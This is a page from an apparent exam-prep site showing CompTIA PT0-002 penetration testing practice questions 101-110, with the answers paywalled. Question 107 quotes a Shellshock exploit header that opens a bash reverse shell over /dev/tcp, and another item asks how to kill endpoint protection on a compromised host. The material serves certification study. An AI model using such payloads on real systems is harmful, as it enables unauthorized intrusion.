ExamGecko
Login
Home / CompTIA / PT0-002 / List of questions
Ask Question

CompTIA PT0-002 Practice Test - Questions Answers, Page 11

Add to Whishlist

List of questions

Question 101

Report Export Collapse

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

Pre-engagement interaction (scoping and ROE)

Intelligence gathering (reconnaissance)

Threat modeling

Vulnerability analysis

Exploitation and post exploitation

Reporting

Which of the following methodologies does the client use?

Become a Premium Member for full access
  Unlock Premium Member

Question 102

Report Export Collapse

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:

nmap -O -A -sS -p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

Become a Premium Member for full access
  Unlock Premium Member

Question 103

Report Export Collapse

A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

Become a Premium Member for full access
  Unlock Premium Member

Question 104

Report Export Collapse

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

Become a Premium Member for full access
  Unlock Premium Member

Question 105

Report Export Collapse

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

Become a Premium Member for full access
  Unlock Premium Member

Question 106

Report Export Collapse

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

Become a Premium Member for full access
  Unlock Premium Member

Question 107

Report Export Collapse

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":

"text/html,application/xhtml+xml,application/xml"}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

Become a Premium Member for full access
  Unlock Premium Member

Question 108

Report Export Collapse

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

Become a Premium Member for full access
  Unlock Premium Member

Question 109

Report Export Collapse

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

Become a Premium Member for full access
  Unlock Premium Member

Question 110

Report Export Collapse

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?

Become a Premium Member for full access
  Unlock Premium Member
Total 464 questions
Go to page: of 47
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

A penetration tester gains access to a system and is able to migrate to a user process: Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
After successfully compromising a remote host, a security consultant notices an endpoint protection software is running on the host. Which of the following commands would be best for the consultant to use to terminate the protection software and its child processes?
A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?
When accessing the URL http://192.168.0-1/validate/user.php , a penetration tester obtained the following output: ..d index: eid in /apache/www/validate/user.php line 12 ..d index: uid in /apache/www/validate/user.php line 13 ..d index: pw in /apache/www/validate/user.php line 14 ..d index: acl in /apache/www/validate/user.php line 15
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal?
An organization is using Android mobile devices but does not use MDM services. Which of the following describes an existing risk present in this scenario?
A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?
Which of the following components should a penetration tester most likely include in a report at the end of an assessment?
A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?